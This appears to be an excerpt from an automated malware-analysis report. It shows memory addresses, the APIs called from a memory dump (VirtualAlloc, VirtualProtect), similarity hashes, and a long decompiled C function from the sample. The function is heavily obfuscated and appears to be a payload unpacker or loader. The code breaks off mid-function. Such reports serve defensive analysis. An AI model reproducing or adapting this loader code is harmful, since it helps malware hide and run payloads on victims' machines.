                  0x032a7191
                  0x032a7191
                  0x032a719d
                  0x032a719e
                  0x032a719e
                  0x032a719e
                  0x032a71a6
                  0x032a71a8
                  0x032a71b0
                  0x032a71b4
                  0x032a71b5
                  0x032a71ba
                  0x032a71c2
                  0x032a71c6
                  0x032a71c7
                  0x032a71c7
                  0x032a71cc
                  0x032a71e0
                  0x032a71ea
                  0x032a71f0
                  0x032a71f1
                  0x032a71f7
                  0x032a71fb
                  0x032a71ff
                  0x032a7201

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000), ref: 032A70D0
                  • VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 032A7138
                  Memory Dump Source
                  • Source File: 00000002.00000002.252004989.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: true
                  Similarity
                  • API ID: Virtual$AllocProtect
                  • String ID:
                  • API String ID: 2447062925-0
                  • Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction ID: e2b0c85ad364e2064e21e694f74d19ef946bc3a5c01380f34745fdc74e064dcd
                  • Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction Fuzzy Hash: 2B418072904704EFEB04DF54C885BAEBBF5EF88710F09849DEC88AB246C7741950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Executed Functions

                  C-Code - Quality: 75%
                  			E046B5F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				void* __edi;
                  				signed int _t610;
                  				void* _t612;
                  				signed int _t613;
                  				intOrPtr _t619;
                  				void* _t626;
                  				void* _t628;
                  				void* _t630;
                  				signed int _t631;
                  				signed int _t633;
                  				signed int _t636;
                  				signed int _t638;
                  				void* _t640;
                  				intOrPtr _t641;
                  				signed int _t644;
                  				void* _t646;
                  				signed int _t647;
                  				signed int _t650;
                  				signed int _t652;
                  				signed int _t653;
                  				intOrPtr _t656;
                  				signed int _t658;
                  				signed int _t661;
                  				signed int _t665;
                  				void* _t667;
                  				signed int _t668;
                  				signed int _t671;
                  				signed int _t675;
                  				signed int _t677;
                  				void* _t679;
                  				signed int _t680;
                  				signed int _t682;
                  				signed int _t684;
                  				signed int _t689;
                  				void* _t691;
                  				signed int _t692;
                  				signed int _t698;
                  				signed int _t701;
                  				signed int _t706;
                  				void* _t708;
                  				intOrPtr _t709;
                  				signed int _t711;
                  				void* _t713;
                  				signed int _t714;
                  				signed int _t717;
                  				intOrPtr _t720;
                  				signed int _t722;
                  				void* _t724;
                  				signed int _t726;
                  				intOrPtr _t729;
                  				void* _t730;
                  				signed int _t733;
                  				void* _t739;
                  				void* _t741;
                  				void* _t742;
                  				signed int _t744;
                  				void* _t746;
                  				signed int _t747;
                  				signed int _t753;
                  				signed int _t756;
                  				signed int _t760;
                  				void* _t762;
                  				signed int _t767;
                  				signed int _t771;
                  				void* _t773;
                  				void* _t775;
                  				void* _t776;
                  				intOrPtr _t778;
                  				signed int _t781;
                  				signed int _t785;
                  				intOrPtr _t788;
                  				signed int _t791;
                  				intOrPtr _t794;
                  				signed int _t797;
                  				signed int _t813;
                  				signed int _t816;
                  				void* _t819;
                  				signed int _t821;
                  				signed int _t824;
                  				void* _t827;
                  				void* _t828;
                  				void* _t830;
                  				signed int _t836;
                  				signed int _t840;
                  				signed int _t842;
                  				signed int _t844;
                  				signed int _t851;
                  				signed int _t856;
                  				signed int _t859;
                  				signed int _t862;
                  				signed int _t865;
                  				signed int _t867;
                  				signed int _t869;
                  				signed int _t875;
                  				signed int _t882;
                  				void* _t888;
                  				signed int _t889;
                  				signed int _t893;
                  				signed int _t896;
                  				signed int _t901;
                  				signed int _t906;
                  				signed int _t908;
                  				signed int _t916;
                  				signed int _t920;
                  				signed int _t924;
                  				signed int _t926;
                  				signed int _t928;
                  				signed int _t931;
                  				signed int _t934;
                  				signed int _t936;
                  				signed int _t939;
                  				signed int _t945;
                  				signed int _t947;
                  				signed int _t950;
                  				signed int _t953;
                  				signed int _t955;
                  				signed int _t958;
                  				void* _t966;
                  				signed int _t969;
                  				signed int _t975;
                  				signed int _t977;
                  				signed int _t979;
                  				signed int _t981;
                  				signed int _t986;
                  				signed int _t987;
                  				signed int _t1002;
                  				signed int _t1005;
                  				signed int _t1009;
                  				signed int _t1012;
                  				signed int _t1015;
                  				signed int _t1018;
                  				signed int _t1020;
                  				signed int _t1023;
                  				signed int _t1026;
                  				signed int _t1028;
                  				signed int _t1031;
                  				signed int _t1034;
                  				signed int _t1035;
                  				void* _t1036;
                  				long _t1041;
                  				void* _t1043;
                  				signed int _t1045;
                  				signed int _t1052;
                  				signed int _t1054;
                  				signed int _t1057;
                  				signed int _t1060;
                  				signed int _t1063;
                  				signed int _t1065;
                  				signed int _t1068;
                  				void* _t1069;
                  				signed int _t1071;
                  				signed int _t1074;
                  				void* _t1077;
                  				signed int _t1078;
                  				signed int _t1081;
                  				signed int _t1085;
                  				void* _t1089;
                  				signed int _t1091;
                  				void* _t1097;
                  				void* _t1102;
                  				signed int _t1103;
                  				signed int _t1106;
                  				void* _t1109;
                  				signed int _t1112;
                  				signed int _t1119;
                  				signed int* _t1120;
                  				signed int* _t1121;
                  				signed int* _t1122;
                  				signed int* _t1123;
                  				signed int* _t1124;
                  				signed int* _t1125;
                  				signed int* _t1126;
                  				signed int* _t1127;
                  				signed int* _t1128;
                  				signed int* _t1129;
                  				signed int* _t1130;
                  				signed int* _t1131;
                  				signed int* _t1132;
                  				signed int* _t1133;
                  				signed int* _t1134;
                  				signed int* _t1136;
                  				signed int* _t1139;
                  				signed int* _t1140;
                  				signed int* _t1141;
                  				signed int* _t1142;
                  				signed int* _t1143;
                  				signed int* _t1144;
                  
                  				_t1063 = __esi;
                  				_t813 = __ebx;
                  				_push(__eax);
                  				 *_t1119 =  *_t1119 & 0x00000000;
                  				 *_t1119 =  *_t1119 + _t1102;
                  				_t1103 = _t1119;
                  				_t1120 = _t1119 + 0xfffffff0;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 + __ecx;
                  				_push(__ecx);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 ^ __edx;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 ^ _t1103;
                  				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
                  				_v16 = _v16 & 0x00000000;
                  				_push(_v16);
                  				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
                  				_push( *((intOrPtr*)(__ebx + 0x41f068))());
                  				_pop( *_t7);
                  				_push(_v16);
                  				_pop( *_t9);
                  				_pop( *_t10);
                  				_t920 = _v16;
                  				_t1121 = _t1120 - 0xfffffffc;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 ^ __esi;
                  				 *_t1121 =  *_t1120;
                  				_push(_v16);
                  				 *_t1121 = _t920;
                  				_push(_t1002);
                  				 *_t1121 =  *_t1121 - _t1002;
                  				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
                  				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(_v16);
                  				 *_t1121 = _t610;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_pop( *_t18);
                  				_push(_t920);
                  				 *_t20 = _t612;
                  				_v20 = _v20 + _v20;
                  				_push(_v20);
                  				_pop(_t613);
                  				_v20 = _t613;
                  				_t836 = 0 ^  *(__ebx + 0x41c55d);
                  				if(_t836 > _v20) {
                  					_push(_v12);
                  					 *_t1121 = __ebx + 0x41c01b;
                  					_push(_t1103);
                  					 *_t1121 =  *_t1121 ^ _t1103;
                  					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  					_push( *((intOrPtr*)(__ebx + 0x41f064))());
                  					_pop( *_t31);
                  					_push(_v20);
                  					_pop( *_t33);
                  				}
                  				_pop( *_t34);
                  				_t924 = _v20;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t924;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
                  				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
                  				_v12 = _t836;
                  				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
                  				 *_t1121 = _t813 + 0x41c565;
                  				_v12 = 0;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
                  				_pop( *_t48);
                  				_push(_v20);
                  				_pop( *_t50);
                  				_pop( *_t51);
                  				 *_t1121 =  *_t1121 - _t1103;
                  				 *_t1121 =  *_t1121 ^ _v20;
                  				 *_t1121 =  *_t1121 ^ _t813;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
                  				_pop( *_t55);
                  				_push(_v16);
                  				_pop( *_t57);
                  				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t626;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
                  				 *_t1121 =  *_t1121 ^ _t924;
                  				 *_t1121 =  *_t1121 + _t628;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
                  				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
                  				_pop( *_t72);
                  				_t840 = _v20;
                  				 *_t74 = _t630;
                  				_v20 = _v20 + _t840;
                  				_push(_v20);
                  				_pop(_t631);
                  				_t1065 = _t1063;
                  				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
                  				_t1106 = _t1103;
                  				if(_t842 > _t631) {
                  					 *_t1121 =  *_t1121 & 0x00000000;
                  					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  					 *_t1121 = _t813 + 0x41cfe9;
                  					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
                  					_push(_t924);
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
                  				}
                  				_t633 = _t631 & 0x00000000 ^  *_t1121;
                  				_t1122 =  &(_t1121[1]);
                  				 *_t1122 = _t1002;
                  				 *(_t813 + 0x41d240) = _t633;
                  				_t1005 = 0;
                  				_pop( *_t88);
                  				_t926 = 0 ^ _v20;
                  				_pop( *_t90);
                  				_t844 = _t842 & 0x00000000 ^ _v16;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t926;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 | _t844;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
                  				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
                  				_t1123 =  &(_t1122[1]);
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1123 =  *_t1123 ^  *_t1122;
                  				_v16 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
                  				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
                  				 *_t1123 =  *_t1123 - _t1106;
                  				 *_t1123 =  *_t1123 | _t638;
                  				_v12 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
                  				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
                  				_t851 =  *_t1123;
                  				_t1124 =  &(_t1123[1]);
                  				 *_t113 = _t640;
                  				_v16 = _v16 + _t851;
                  				_push(_v16);
                  				_pop(_t641);
                  				_t928 = _t926;
                  				_v16 = _t1005;
                  				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
                  					_v12 = 0;
                  					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
                  					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
                  				}
                  				 *_t1124 = _t928;
                  				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
                  				_t931 = 0;
                  				_v12 = _t1065;
                  				_t1068 = _v12;
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 | 0 ^ _a4;
                  				_v16 = 0;
                  				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
                  				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 ^ _t644;
                  				 *_t1124 = _t813 + 0x41cb65;
                  				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
                  				_t1125 =  &(_t1124[1]);
                  				_v12 = _t931;
                  				_push( *_t1124 + _t646);
                  				_t934 = _v12;
                  				_pop(_t647);
                  				_v12 = _t647;
                  				_t856 = 0 ^  *(_t813 + 0x41c187);
                  				_t650 = _v12;
                  				if(_t856 > _t650) {
                  					_v20 = 0;
                  					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
                  					 *_t1125 =  *_t1125 ^ _t856;
                  					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
                  					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
                  					_v16 = _t1068;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
                  					_t1068 = _v16;
                  				}
                  				_t652 = _t650 & 0x00000000 ^  *_t1125;
                  				_t1126 = _t1125 - 0xfffffffc;
                  				 *_t162 = _t652;
                  				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
                  				_push(_v16);
                  				_pop(_t653);
                  				_t936 = _t934;
                  				 *_t1126 = _t653;
                  				 *_t1126 =  *_t1126 & 0x00000000;
                  				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
                  				 *_t1126 = _t813 + 0x41ce8a;
                  				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
                  				 *_t1126 = _t1106;
                  				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
                  				_t1109 = 0;
                  				_t658 =  *_t1126;
                  				_t1127 =  &(_t1126[1]);
                  				 *_t1127 = _t658;
                  				 *_t1127 =  *_t1127 - _t856;
                  				 *_t1127 =  *_t1127 ^ _t658;
                  				 *_t1127 =  *_t1127 - _t936;
                  				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
                  				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
                  				 *_t1127 = _t936;
                  				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
                  				_t939 = 0;
                  				_t1128 = _t1127 - 0xfffffffc;
                  				_v20 = _t813;
                  				_t1009 =  *_t1127;
                  				_t816 = _v20;
                  				_v12 = 0;
                  				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
                  				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
                  				 *_t1128 =  *_t1128 ^ _t1009;
                  				 *_t1128 = _t665;
                  				 *_t1128 =  *_t1128 - _t1009;
                  				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
                  				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
                  				_t1129 =  &(_t1128[1]);
                  				 *_t1129 =  *_t1129 ^ _t1068;
                  				_t1069 = _t667;
                  				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
                  				_t1071 = 0;
                  				_v20 = _t1009;
                  				_t859 = 0 ^  *(_t816 + 0x41c250);
                  				_t1012 = _v20;
                  				if(_t859 > _t668) {
                  					 *_t1129 =  *_t1129 - _t1012;
                  					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
                  					_v12 = 0;
                  					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
                  					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
                  				}
                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
                  				_t862 = _t859;
                  				 *_t1129 =  *_t1129 - _t1071;
                  				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
                  				 *_t1129 = _t816 + 0x41ca88;
                  				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
                  				_v20 = _t862;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
                  				_t865 = _v20;
                  				_pop( *_t211);
                  				_v8 = _v8 & 0x00000000;
                  				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
                  				_t819 = _t816;
                  				 *_t1129 =  *_t1129 & 0x00000000;
                  				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
                  				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
                  				_t1112 = _t1109;
                  				 *_t1129 =  *_t1129 - _t865;
                  				 *_t1129 =  *_t1129 ^ _t1012;
                  				 *_t1129 = _t819 + 0x41ca0d;
                  				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
                  				 *_t1129 = _t677;
                  				 *_t1129 = _t819 + 0x41cbe6;
                  				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
                  				_t867 =  *_t1129;
                  				_t1130 = _t1129 - 0xfffffffc;
                  				 *_t230 = _t679;
                  				_v16 = _v16 + _t867;
                  				_push(_v16);
                  				_pop(_t680);
                  				_t821 = _t819;
                  				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
                  				_t1074 = _t1071;
                  				if(_t869 > _t680) {
                  					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
                  					_v12 = 0;
                  					 *_t1130 =  *_t1130 | _t235;
                  					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
                  					 *_t1130 =  *_t1130 & 0x00000000;
                  					 *_t1130 =  *_t1130 + _t238;
                  					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
                  				}
                  				 *_t1130 = _t1012;
                  				 *(_t821 + 0x41c918) = 0 ^ _t680;
                  				_t1015 = 0;
                  				_v16 = _t869;
                  				_v16 = 0;
                  				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
                  				_t247 = _t821 + 0x41d093; // 0x41d093
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 | _t247;
                  				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t1130 = _t1015;
                  				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
                  				_t1018 = 0;
                  				 *_t250 = _t821;
                  				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
                  				_t1077 = _t1074;
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 ^ _v16;
                  				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
                  				_v20 = 0;
                  				 *_t1130 =  *_t1130 | _t253;
                  				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
                  				_v20 = _t1020;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
                  				_t1023 = _v20;
                  				_t1131 =  &(_t1130[1]);
                  				 *_t1131 = _t684;
                  				_t1078 = _a4;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 |  *_t1130;
                  				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t268;
                  				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t689;
                  				_t273 = _t821 + 0x41c931; // 0x41c931
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t273;
                  				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t275 = _t1023;
                  				_v20 = _t821;
                  				_push(0 + _v16 + _t691);
                  				_t824 = _v20;
                  				_pop(_t692);
                  				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
                  				_pop( *_t280);
                  				_push(_v12);
                  				_pop(_t875);
                  				if(_t875 > _t692) {
                  					 *_t1131 = _t824 + 0x41ca9e;
                  					 *_t1131 =  *_t1131 & 0x00000000;
                  					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
                  					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
                  					 *_t286 = _t692;
                  					_push(_v16);
                  					_pop( *_t288);
                  				}
                  				_pop( *_t289);
                  				_t945 = _v12;
                  				_v12 = _t692;
                  				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
                  				 *_t1131 =  *_t1131 ^ _t824;
                  				 *_t1131 =  *_t1131 + _t945;
                  				_v12 = 0;
                  				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
                  				 *_t1131 = _t824 + 0x41c856;
                  				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
                  				_v20 = _t1078;
                  				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
                  				_t1081 = _v20;
                  				_pop( *_t304);
                  				_t947 = 0 ^ _v20;
                  				_t879 = 0 ^  *_t1131;
                  				_t1132 = _t1131 - 0xfffffffc;
                  				if(_t1023 != _t1081) {
                  					 *_t1132 =  *_t1132 - _t1023;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t947;
                  					_v16 = 0;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
                  					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t739;
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
                  					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
                  					_t1139 = _t1132 - 0xfffffffc;
                  					 *_t317 = _t741;
                  					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v20);
                  					_pop(_t742);
                  					_t1045 = _t1023;
                  					_push(0);
                  					 *_t1139 = _t1045;
                  					_t906 = 0 ^  *(_t824 + 0x41c244);
                  					if(_t906 > _t742) {
                  						 *_t1139 =  *_t1139 ^ _t906;
                  						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
                  						 *_t1139 =  *_t1139 & 0x00000000;
                  						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
                  						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
                  						_push(0);
                  						 *_t1139 = _t947;
                  						 *(_t824 + 0x41cf47) = 0 ^ _t797;
                  					}
                  					_pop( *_t326);
                  					_t969 = _v12;
                  					_t908 =  *_t1139;
                  					_t1140 = _t1139 - 0xfffffffc;
                  					do {
                  						asm("movsb");
                  						_v12 = 0;
                  						 *_t1140 =  *_t1140 + _t908;
                  						_v12 = _v12 & 0x00000000;
                  						 *_t1140 =  *_t1140 + _t969;
                  						 *_t1140 =  *_t1140 - _t969;
                  						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
                  						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
                  						 *_t1140 =  *_t1140 ^ _t1112;
                  						 *_t1140 =  *_t1140 ^ _t744;
                  						 *_t1140 =  *_t1140 & 0x00000000;
                  						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
                  						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
                  						_t1141 =  &(_t1140[1]);
                  						 *_t337 = _t746;
                  						_v20 = _v20 +  *_t1140;
                  						_push(_v20);
                  						_pop(_t747);
                  						_t1081 = _t1081;
                  						_v12 = _t747;
                  						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
                  							 *_t1141 = _t824 + 0x41c831;
                  							 *_t1141 = _t824 + 0x41c7fa;
                  							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
                  							_v16 = _t969;
                  							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
                  						}
                  						_pop( *_t352);
                  						_t969 = 0 + _v12;
                  						_t1140 = _t1141 - 0xfffffffc;
                  						_t908 =  *_t1141 - 1;
                  					} while (_t908 != 0);
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t969;
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
                  					_v20 = 0;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
                  					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
                  					_t975 =  *_t1140;
                  					_t1142 = _t1140 - 0xfffffffc;
                  					_v12 = _t753;
                  					_t756 = _v12;
                  					 *_t1142 =  *_t1142 ^ _t756;
                  					 *_t1142 =  *_t1142 ^ _t975;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
                  					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
                  					_pop( *_t371);
                  					_push(_v16);
                  					_pop( *_t373);
                  					_pop( *_t374);
                  					_t977 = _t975 & 0x00000000 ^ _v16;
                  					 *(_t824 + 0x41c60a) = 0x40;
                  					 *_t1142 = _t977;
                  					_v16 = 0;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
                  					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
                  					 *_t1142 = _t760;
                  					 *_t1142 = _t824 + 0x41c438;
                  					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
                  					_pop( *_t386);
                  					 *_t1142 =  *_t1142 | _t824;
                  					_t830 = _t762;
                  					_t824 = 0;
                  					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
                  					_t916 =  *(_t824 + 0x41d118);
                  					_t1052 = _v16;
                  					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
                  						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
                  						 *_t1142 =  *_t1142 - _t916;
                  						 *_t1142 =  *_t1142 + _t391;
                  						_t392 = _t824 + 0x41c438; // 0x41c438
                  						 *_t1142 =  *_t1142 ^ _t977;
                  						 *_t1142 =  *_t1142 | _t392;
                  						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
                  						_v20 = _t977;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
                  					}
                  					_t979 =  *_t1142;
                  					_t1143 = _t1142 - 0xfffffffc;
                  					_t401 = _t824 + 0x41c60a; // 0x41c60a
                  					 *_t1143 =  *_t1143 - _t979;
                  					 *_t1143 =  *_t1143 ^ _t401;
                  					 *_t1143 = _t979;
                  					_t403 = _t824 + 0x41cb46; // 0x41cb46
                  					 *_t1143 =  *_t1143 & 0x00000000;
                  					 *_t1143 =  *_t1143 + _t403;
                  					_t404 = _t824 + 0x41c91c; // 0x41c91c
                  					 *_t1143 = _t404;
